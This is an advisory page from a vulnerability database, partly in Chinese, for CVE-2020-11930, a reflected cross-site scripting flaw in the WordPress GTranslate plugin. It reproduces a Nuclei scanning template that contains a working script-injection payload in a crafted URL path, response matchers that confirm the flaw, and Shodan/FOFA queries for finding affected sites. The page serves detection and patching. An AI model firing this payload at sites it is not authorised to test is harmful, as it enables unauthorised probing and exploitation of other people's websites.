CVE-2020-11930: WordPress GTranslate <2.8.52 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress GTranslate | POC: 已公开

漏洞描述

WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.

PoC代码[已公开]

id: CVE-2020-11930

info:
  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
  remediation: |
    Update the WordPress GTranslate plugin to version 2.8.52 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/10181
    - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
    - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
    - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11930
    cwe-id: CWE-79
    epss-score: 0.04451
    epss-percentile: 0.88635
    cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: gtranslate
    product: translate_wordpress_with_gtranslate
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/gtranslate
    fofa-query: body=/wp-content/plugins/gtranslate
    publicwww-query: "/wp-content/plugins/gtranslate"
  tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate

http:
  - method: GET
    path:
      - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'uri-translation'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dfe05e09214ccce79179e67c75778420fec13bb52b664f8cc0c0ef37cf3c0d49022100abd67f553dcc5e94bc7504654ae51e7f76673dc995aec679c0f6bfc5f77b0749:922c64590222798bb761d5b6d8e72950

相关漏洞推荐